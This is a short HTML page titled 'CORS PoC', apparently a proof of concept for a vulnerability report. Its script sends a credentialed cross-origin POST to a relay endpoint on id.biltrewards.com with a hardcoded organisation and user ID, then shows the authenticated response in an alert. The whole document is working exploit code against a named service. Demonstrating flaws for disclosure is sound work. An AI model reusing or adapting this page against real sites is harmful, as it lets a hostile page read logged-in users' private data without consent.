<!DOCTYPE html>
<html>
  <body>
    <h1>CORS PoC</h1>
    <script>
      fetch("https://id.biltrewards.com/fsrelay/rec/bundle/v2?OrgId=13PEW8&UserId=0c73f58d-0907-48f9-996c-9a89f09f1ff1", {
        method: "POST",
        credentials: "include",
        headers: {
          "Content-Type": "text/plain"
        },
        body: '{"Seq":10,"When":98019,"Evts":[]}'
      })
      .then(res => res.text())
      .then(data => {
        alert("Response: " + data);
      });
    </script>
  </body>
</html>
